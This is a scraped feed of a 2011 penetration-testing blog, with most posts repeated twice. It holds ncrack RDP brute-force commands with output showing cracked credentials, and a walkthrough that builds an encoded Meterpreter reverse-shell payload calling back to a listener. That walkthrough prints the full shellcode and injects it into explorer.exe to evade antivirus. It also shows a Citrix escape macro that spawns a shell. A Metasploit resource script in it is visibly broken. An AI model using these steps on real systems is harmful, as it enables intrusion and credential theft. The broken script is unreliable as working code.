So interesting stuff this week.

DerbyCon videos are slowly being posted. they're here:
http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist

Specifically, watch Chris Nickerson's talk. Its funny and has a point.
http://www.irongeek.com/i.php?page=videos/derbycon1/chris-nickerson-compliance-an-assault-on-reason

So far i've watched Carlos Perez's and Rick Redman's, both were good. Caught most of jadedsecurity's on track2, also good.

SK Hack by an Advanced Persistent Threat
http://www.commandfive.com/papers/C5_APT_SKHack.pdf

Coldfusion is interesting to me, specially with the tight java intergration. You can do alot with it. The future of coldfusion from ColdFusionJedi
http://www.coldfusionjedi.com/index.cfm/2011/10/4/My-MAX-Preso--the-future-of-ColdFusion

The rest of the stuff that was interesting is shared via google reader:
http://www.google.com/reader/shared/carnal0wnage
Tags:

19:10
Weekly "That's Interesting" Wrap-Up 7 Oct 2011
» ‎ Carnal0wnage

i'm probably gonna fail miserably at regularly posting anything but F it, im motivated right now and that's what matters.

So interesting stuff this week.

DerbyCon videos are slowly being posted. they're here:
http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist

Specifically, watch Chris Nickerson's talk. Its funny and has a point.
http://www.irongeek.com/i.php?page=videos/derbycon1/chris-nickerson-compliance-an-assault-on-reason

So far i've watched Carlos Perez's and Rick Redman's, both were good. Caught most of jadedsecurity's on track2, also good.

SK Hack by an Advanced Persistent Threat
http://www.commandfive.com/papers/C5_APT_SKHack.pdf

Coldfusion is interesting to me, specially with the tight java intergration. You can do alot with it. The future of coldfusion from ColdFusionJedi
http://www.coldfusionjedi.com/index.cfm/2011/10/4/My-MAX-Preso--the-future-of-ColdFusion

The rest of the stuff that was interesting is shared via google reader:
http://www.google.com/reader/shared/carnal0wnage
Tags: wrap Weekly stuff chris-nickerson rick-redman carlos-perez google wrap-up

September 30, 2011
4:11
ncrack with domain creds
» ‎ carnal0wnage.attackresearch.com

little post on using ncrack to brute/check domain creds

user@ubuntu:~/pentest/msf3$ ncrack 192.168.1.52:3389,CL=2 --user=username@domain --pass=myl33tpassword -vvv -d7

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-09-29 14:48 PDT

rdp://192.168.1.52:3389 Account credentials are valid, however, the maximum number of terminal services connections has been reached.
Discovered credentials on rdp://192.168.1.52:3389 'username@domain' 'myl33tpassword'
rdp://192.168.1.52:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.90
rdp://192.168.1.52:3389 finished.
Tags:

4:11
ncrack with domain creds
» ‎ Carnal0wnage

little post on using ncrack to brute/check domain creds

user@ubuntu:~/pentest/msf3$ ncrack 192.168.1.52:3389,CL=2 --user=username@domain --pass=myl33tpassword -vvv -d7

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-09-29 14:48 PDT

rdp://192.168.1.52:3389 Account credentials are valid, however, the maximum number of terminal services connections has been reached.
Discovered credentials on rdp://192.168.1.52:3389 'username@domain' 'myl33tpassword'
rdp://192.168.1.52:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.90
rdp://192.168.1.52:3389 finished.
Tags: ncrack domain username check-domain terminal-services maximum-number

September 15, 2011
8:20
Where have you been!?
» ‎ carnal0wnage.attackresearch.com

I've been busy... :-(

But i do have some upcoming conference speaking engagements coming up.

So. If you are heading to BruCon

catch me and Joe McCray talk about Pentesting High Security Environments.

If you are heading to DerbyCon

Catch me and Rob Fuller talk about The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

Lastly, if you'll be in Switzerland for Hashdays

You can catch me talk about From Low to Pwned.

I'll also be giving a talk at the Management workshop on Information Operations for Management (sorry the info isn't on the site yet but should be here https://www.hashdays.ch/management-session.html at some point).

I'm sure there will be more stuff in November/December its just not scheduled yet.
Tags:

8:20
Where have you been!?
» ‎ Carnal0wnage

I've been busy... :-(

But i do have some upcoming conference speaking engagements coming up.

So. If you are heading to BruCon

catch me and Joe McCray talk about Pentesting High Security Environments.

If you are heading to DerbyCon

Catch me and Rob Fuller talk about The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

Lastly, if you'll be in Switzerland for Hashdays

You can catch me talk about From Low to Pwned.

I'll also be giving a talk at the Management workshop on Information Operations for Management (sorry the info isn't on the site yet but should be here https://www.hashdays.ch/management-session.html at some point).

I'm sure there will be more stuff in November/December its just not scheduled yet.
Tags: talk management Pentesting joe-mccray rob-fuller switzerland dirty-little-secrets security-environments speaking-engagements carnal0wnage

August 29, 2011

Permalink for 'Using ncrack to test for servers vuln to Morto worm'

8:43

Using ncrack to test for servers vuln to Morto worm

» ‎ carnal0wnage.attackresearch.com

Looks like the Morto worm is floating around. I frequently run into just seeing 3389 open on pentests and if the local admin account is "administrator" you can beat up on it pretty good with ncrack.

hdm did a post on why/how you can find those pesky local admin accounts with weak password by using the smb_login module. post is here.

If you live where someone is gonna give you a hassle because SMB is not allowed out, you can always use ncrack to prove your point. I did a short post on it awhile back.

Anway, grab it from nmap svn, and compile, dont think the RDP plugin for it was enabled in the downloadable binaries (i didnt check...i use the svn).

The F-Secure blog has the list of passwords its using here.

Looks like this:



$ ncrack -vv -d7 --user administrator -P /home/user/morto.txt 192.168.26.137:3389,CL=2



rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'

rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94

rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'

rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2

...

Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'

rdp://192.168.26.137:3389 last: 0.02 current 0.01 parallelism 2

rdp://192.168.26.137:3389 Increasing connection limit to: 2

rdp://192.168.26.137:3389 (EID 30) Attempts: total 30 completed 30 supported 1 --- rate 1.62

rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'

rdp://192.168.26.137:3389 finished.

rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81

nsock_loop returned 3



Discovered credentials for rdp on 192.168.26.137 3389/tcp:

192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'



Ncrack done: 1 service scanned in 18.00 seconds.

Probes sent: 31 timed-out: 0 prematurely-closed: 0



Ncrack finished.

Tags:

8:43

Using ncrack to test for servers vuln to Morto worm

» ‎ Carnal0wnage



$ ncrack -vv -d7 --user administrator -P /home/user/morto.txt 192.168.26.137:3389,CL=2



rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'

rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94

rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'

rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2

...

Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'

rdp://192.168.26.137:3389 last: 0.02 current 0.01 parallelism 2

rdp://192.168.26.137:3389 Increasing connection limit to: 2

rdp://192.168.26.137:3389 (EID 30) Attempts: total 30 completed 30 supported 1 --- rate 1.62

rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'

rdp://192.168.26.137:3389 finished.

rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81

nsock_loop returned 3



Discovered credentials for rdp on 192.168.26.137 3389/tcp:

192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'



Ncrack done: 1 service scanned in 18.00 seconds.

Probes sent: 31 timed-out: 0 prematurely-closed: 0



Ncrack finished.

Tags: ncrack eid administrator admin-accounts admin-account hdm

July 01, 2011

Permalink for 'Process Injection Outside of Metasploit'

4:12

Process Injection Outside of Metasploit

» ‎ carnal0wnage.attackresearch.com

You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.

There are two public options I have found; shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.

shellcodeexec

https://github.com/inquisb/shellcodeexec

http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html

= Short description =

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

Make the payload:


$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA

Set up a listener to catch the shell:

$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Run it on the windows side:

C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt

Once you have shell you need to migrate out of it, it will be in the shellcodeexec process and as soon as someone ctrl-c or kills that cmd.exe the process dies and so does your shell

Looks like this:

Syringe

http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx

http://www.securestate.com/Documents/syringe.c

= Short description =

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

To compile “C:\codelocation\cl syringe.c”

C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility

Usage:

Inject DLL:
       syringe.exe -1 [ dll ] [ pid ]

Inject Shellcode:
       syringe.exe -2 [ shellcode ] [ pid ]

Execute Shellcode:
       syringe.exe -3 [ shellcode ]

-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell

-2 is preferred, located explorer.exe inject shellcode into that


C:\Documents and Settings\User\Desktop>tasklist  
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        424 K
csrss.exe                    604 Console                 0      3,852 K
winlogon.exe                 628 Console                 0      5,012 K
services.exe                 680 Console                 0      3,440 K
lsass.exe                    692 Console                 0      1,408 K
vmacthlp.exe                 848 Console                 0      2,756 K
svchost.exe                  864 Console                 0      4,924 K
svchost.exe                  944 Console                 0      4,308 K
MsMpEng.exe                 1040 Console                 0     53,812 K
svchost.exe                 1076 Console                 0     23,780 K
svchost.exe                 1164 Console                 0      3,616 K
svchost.exe                 1368 Console                 0      3,916 K
explorer.exe                1624 Console                 0     15,256 K
spoolsv.exe                 1656 Console                 0      6,072 K
VMwareTray.exe              1848 Console                 0      5,044 K
VMwareUser.exe              1856 Console                 0      6,328 K
msseces.exe                 1864 Console                 0     10,708 K
jusched.exe                 1920 Console                 0      4,304 K
msmsgs.exe                  1928 Console                 0      2,488 K
ctfmon.exe                  1952 Console                 0      3,248 K
svchost.exe                  740 Console                 0      3,760 K
jqs.exe                     1108 Console                 0      1,396 K
vmtoolsd.exe                1264 Console                 0      9,976 K
VMUpgradeHelper.exe         1212 Console                 0      4,176 K
TPAutoConnSvc.exe           2396 Console                 0      4,392 K
alg.exe                     2680 Console                 0      3,612 K
TPAutoConnect.exe           3060 Console                 0      4,848 K
iexplore.exe                3784 Console                 0     16,300 K
iexplore.exe                4064 Console                 0     45,392 K
wuauclt.exe                 1224 Console                 0      4,276 K
java.exe                    1112 Console                 0     27,516 K
java.exe                    2520 Console                 0     14,272 K
notepad.exe                  440 Console                 0      3,572 K
jucheck.exe                 3112 Console                 0      6,120 K
cmd.exe                     3260 Console                 0      2,700 K
tasklist.exe                3332 Console                 0      4,580 K
wmiprvse.exe                3368 Console                 0      5,824 K

C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624

Looks like this (you can use the same shellcode in syringe):

Tags:

4:12

Process Injection Outside of Metasploit

» ‎ Carnal0wnage


$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA

Set up a listener to catch the shell:

$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Run it on the windows side:

C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt

Syringe

http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspx

http://www.securestate.com/Documents/syringe.c

= Short description =

To compile “C:\codelocation\cl syringe.c”

C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility

Usage:

Inject DLL:
       syringe.exe -1 [ dll ] [ pid ]

Inject Shellcode:
       syringe.exe -2 [ shellcode ] [ pid ]

Execute Shellcode:
       syringe.exe -3 [ shellcode ]

-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell

-2 is preferred, located explorer.exe inject shellcode into that


C:\Documents and Settings\User\Desktop>tasklist  
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        424 K
csrss.exe                    604 Console                 0      3,852 K
winlogon.exe                 628 Console                 0      5,012 K
services.exe                 680 Console                 0      3,440 K
lsass.exe                    692 Console                 0      1,408 K
vmacthlp.exe                 848 Console                 0      2,756 K
svchost.exe                  864 Console                 0      4,924 K
svchost.exe                  944 Console                 0      4,308 K
MsMpEng.exe                 1040 Console                 0     53,812 K
svchost.exe                 1076 Console                 0     23,780 K
svchost.exe                 1164 Console                 0      3,616 K
svchost.exe                 1368 Console                 0      3,916 K
explorer.exe                1624 Console                 0     15,256 K
spoolsv.exe                 1656 Console                 0      6,072 K
VMwareTray.exe              1848 Console                 0      5,044 K
VMwareUser.exe              1856 Console                 0      6,328 K
msseces.exe                 1864 Console                 0     10,708 K
jusched.exe                 1920 Console                 0      4,304 K
msmsgs.exe                  1928 Console                 0      2,488 K
ctfmon.exe                  1952 Console                 0      3,248 K
svchost.exe                  740 Console                 0      3,760 K
jqs.exe                     1108 Console                 0      1,396 K
vmtoolsd.exe                1264 Console                 0      9,976 K
VMUpgradeHelper.exe         1212 Console                 0      4,176 K
TPAutoConnSvc.exe           2396 Console                 0      4,392 K
alg.exe                     2680 Console                 0      3,612 K
TPAutoConnect.exe           3060 Console                 0      4,848 K
iexplore.exe                3784 Console                 0     16,300 K
iexplore.exe                4064 Console                 0     45,392 K
wuauclt.exe                 1224 Console                 0      4,276 K
java.exe                    1112 Console                 0     27,516 K
java.exe                    2520 Console                 0     14,272 K
notepad.exe                  440 Console                 0      3,572 K
jucheck.exe                 3112 Console                 0      6,120 K
cmd.exe                     3260 Console                 0      2,700 K
tasklist.exe                3332 Console                 0      4,580 K
wmiprvse.exe                3368 Console                 0      5,824 K

C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624

Looks like this (you can use the same shellcode in syringe):

Tags: metasploit public-options exception-handler Pentesting

June 24, 2011
17:41
Welcome Ken "cktricky" Johnson!
» ‎ carnal0wnage.attackresearch.com

Ken "cktricky" Johnson has agreed to join the carnal0wnage/attackresearch blog and I cant be more excited. Ken brings tons of webappsec kung fu and is the core developer for wXf. He should be adding lots of webappsec goodness.

you can catch him on twitter as well @cktricky

Welcome Ken!

-CG
Tags:

17:41
Welcome Ken "cktricky" Johnson!
» ‎ Carnal0wnage

Ken "cktricky" Johnson has agreed to join the carnal0wnage/attackresearch blog and I cant be more excited. Ken brings tons of webappsec kung fu and is the core developer for wXf. He should be adding lots of webappsec goodness.

you can catch him on twitter as well @cktricky

Welcome Ken!

-CG
Tags: cktricky carnal webappsec ken johnson welcome-ken wxf kung-fu news

June 23, 2011
8:38
Restricted Citrix Excel Application Escapes
» ‎ carnal0wnage.attackresearch.com
SynJunkie has a couple good posts on citrix escapes:

http://synjunkie.blogspot.com/search/label/Citrix

and of course iKat

http://ikat.ha.cked.net/

So recently I had to break out of restricted citrix environment. All I had was Excel 2010 and Word 2010.

I also didnt have a fancy "jump to url" option when I clicked on the title bar and none of the hot keys were working for me. So goal was to get a web broswer or cmd shell.

I was able to create macros though. So first I added the developers ribbon.

Click the visual basic button, and paste in some sweet macro code.

Then you save the file as macro enabled workbook.

Once its saved, you can hit the macro button and run your macro.

and get shell

** To be clear all of this is running remotely on the citrix host.**
The macro code
```
Sub GETSHELL()
'execute EXE file
Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub
```
You could also just type a url into excel...

and click it..But that's pretty low tech and not much fun :-)
Again this IE browser is running remotely on the citrix host. From here you can client-side exploit yourself...i.e. java applet exloit... to get your outbound shell.

Tags:

8:38
Restricted Citrix Excel Application Escapes
» ‎ Carnal0wnage
SynJunkie has a couple good posts on citrix escapes:

http://synjunkie.blogspot.com/search/label/Citrix

and of course iKat

http://ikat.ha.cked.net/

So recently I had to break out of restricted citrix environment. All I had was Excel 2010 and Word 2010.

I also didnt have a fancy "jump to url" option when I clicked on the title bar and none of the hot keys were working for me. So goal was to get a web broswer or cmd shell.

I was able to create macros though. So first I added the developers ribbon.

Click the visual basic button, and paste in some sweet macro code.

Then you save the file as macro enabled workbook.

Once its saved, you can hit the macro button and run your macro.

and get shell

** To be clear all of this is running remotely on the citrix host.**
The macro code
```
Sub GETSHELL()
'execute EXE file
Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub
```
You could also just type a url into excel...

and click it..But that's pretty low tech and not much fun :-)
Again this IE browser is running remotely on the citrix host. From here you can client-side exploit yourself...i.e. java applet exloit... to get your outbound shell.

Tags: citrix cmd macro k-c web-broswer macro-button macro-code hacking

June 19, 2011
14:41
Strategic Security -- Exploit Development Course
» ‎ carnal0wnage.attackresearch.com

Joe McCray with Strategic Security is running a two week exploit dev course.

Course Description & Instructor Information:

http://strategicsec.com/Exploit-Dev-Courses-Oct-2011.pdf

Strategic Security has teamed up with Net-Square to provide the most comprehensive exploit development course package available to the public. Occasionally similar courses are offered privately to various three letter agencies and large financial institutions.

Exploit development is often considered the most difficult area of focus in the entire field of IT security. It requires both a broad range of skills and deep level of knowledge in Networking, Operating Systems, and Programming. Now you too can learn what has long been thought to be "Black Magic" by many from one of the top practitioners and trainers in the world.

How is this course put together?
The course is actually a 2 week package deal designed to both teach the fundamentals of modern exploit development and give the student ample guided practice time with the instructor to actually get proficient.

Dates:

Exploit Dev: No Assembly Required Oct 31 - 4 Nov 2011 (5 Days)
Exploit Dev: Target Practice Nov 7 - 11 2011 (5 Days)

Training Location

The workshops will be held at "The Academy of Computer Education" in Greenbelt, MD.
The address is:

7833 Walker Drive, Suite 520C Greenbelt, Maryland 20770

$1000 Discount by using these links

Exploit Dev 1 Week @ $5,000
http://tinyurl.com/SS-EDNAR-D-CG

Exploit Dev 1 Week @ $6,000
http://tinyurl.com/SS-D-EDTP-CG

Exploit Dev 2 Week Package Deal @ 8,500
http://tinyurl.com/SS-EDNAR-TP-D-CG
Tags:

14:41
Strategic Security -- Exploit Development Course
» ‎ Carnal0wnage

Joe McCray with Strategic Security is running a two week exploit dev course.

Course Description & Instructor Information:

http://strategicsec.com/Exploit-Dev-Courses-Oct-2011.pdf

Strategic Security has teamed up with Net-Square to provide the most comprehensive exploit development course package available to the public. Occasionally similar courses are offered privately to various three letter agencies and large financial institutions.

Exploit development is often considered the most difficult area of focus in the entire field of IT security. It requires both a broad range of skills and deep level of knowledge in Networking, Operating Systems, and Programming. Now you too can learn what has long been thought to be "Black Magic" by many from one of the top practitioners and trainers in the world.

How is this course put together?
The course is actually a 2 week package deal designed to both teach the fundamentals of modern exploit development and give the student ample guided practice time with the instructor to actually get proficient.

Dates:

Exploit Dev: No Assembly Required Oct 31 - 4 Nov 2011 (5 Days)
Exploit Dev: Target Practice Nov 7 - 11 2011 (5 Days)

Training Location

The workshops will be held at "The Academy of Computer Education" in Greenbelt, MD.
The address is:

7833 Walker Drive, Suite 520C Greenbelt, Maryland 20770

$1000 Discount by using these links

Exploit Dev 1 Week @ $5,000
http://tinyurl.com/SS-EDNAR-D-CG

Exploit Dev 1 Week @ $6,000
http://tinyurl.com/SS-D-EDTP-CG

Exploit Dev 2 Week Package Deal @ 8,500
http://tinyurl.com/SS-EDNAR-TP-D-CG
Tags: week dev course joe-mccray c-greenbelt walker-drive maryland net-square greenbelt-maryland greenbelt-md target-practice

May 23, 2011
18:08
carnal0wnage/Attack Research Blog Back On Blogger
» ‎ carnal0wnage.attackresearch.com

Carnal0wnage/Attack Research Blog is back on blogspot. URL is still http://carnal0wnage.attackresearch.com and http://carnal0wnage.blogspot.com should redirect you to the right place. I doubt that RSS feeds will be so lucky though...you'll probably want to update your feeds.

Hopefully being back on blogger will allow for more and better discussions than on the drupal site and if the blind elephant guy is working on an update, hopefully this fucks up his talk and he doesn't get to call us out this year b/c Drupal sucks to update/manage.

-CG
Tags:

18:08
carnal0wnage/Attack Research Blog Back On Blogger
» ‎ Carnal0wnage

Carnal0wnage/Attack Research Blog is back on blogspot. URL is still http://carnal0wnage.attackresearch.com and http://carnal0wnage.blogspot.com should redirect you to the right place. I doubt that RSS feeds will be so lucky though...you'll probably want to update your feeds.

Hopefully being back on blogger will allow for more and better discussions than on the drupal site and if the blind elephant guy is working on an update, hopefully this fucks up his talk and he doesn't get to call us out this year b/c Drupal sucks to update/manage.

-CG
Tags: wnage attack carnal elephant drupal fucks news

April 27, 2011
6:46
Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2
» ‎ carnal0wnage.attackresearch.com

In the previous post I talked about using the db_service -R to use the information in your database/workspace to throw an auxiliary module at hosts that had port 443 open.

Let's take this one step further...and throw multiple aux modules against the hosts that have port 80 open.

I'm going to use a resource script to do this. The cool thing about resource scripts is that you dont have to do them just at startup. You can do them anytime on the console.
-->
read more

Tags:

Permalink for 'Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2'

6:15

Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2

» ‎ carnal0wnage.attackresearch.com

In the previous post I talked about using the db_service -R to use the information in your database/workspace to throw an auxiliary module at hosts that had port 443 open.

Let's take this one step further...and throw multiple aux modules against the hosts that have port 80 open.

I'm going to use a resource script to do this. The cool thing about resource scripts is that you dont have to do them just at startup. You can do them anytime on the console.

msf auxiliary(options) > resource
Usage: resource path1 path2 ...

Run the commands stored in the supplied files.

In this case i want to run two modules against every port that has 80 open. Here's some code to do it:


set THREADS 10

[ruby] **#replace [ and ] with their respective ""**'

#start with an array to hold our modules we want to run
modules = [
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/http/options",]

#another array for our hosts
hosts = []
framework.db.services.each do |service| 
 if service.port == 443 
  hosts  end
end

#loop through each module in the list
modules.each do |blah|
 self.run_single("use #{blah}")
  puts ("\nRunning Auxiliary Module #{blah}")
                #for each host with 443 open, set appropriate configs and run the module against it
  hosts.each do |rhost|
          self.run_single("set RHOSTS #{rhost}")
   self.run_single("set RPORT 443") #change to the port above
   self.run_single("set SSL TRUE")
          self.run_single("run")
  end 
end
[/ruby] **#replace [ and ] with their respective ""**

Running it:


msf auxiliary(options) > resource /home/user/.msf3/aux_do_dbhosts.rc 
resource (/home/user/.msf3/aux_do_dbhosts.rc)> set THREADS 10
THREADS => 10
[*] resource (/home/user/.msf3/aux_do_dbhosts.rc)> Ruby Code (962 bytes)

Running Auxiliary Module auxiliary/scanner/http/http_version
RHOSTS => 192.168.1.10
RPORT => 443
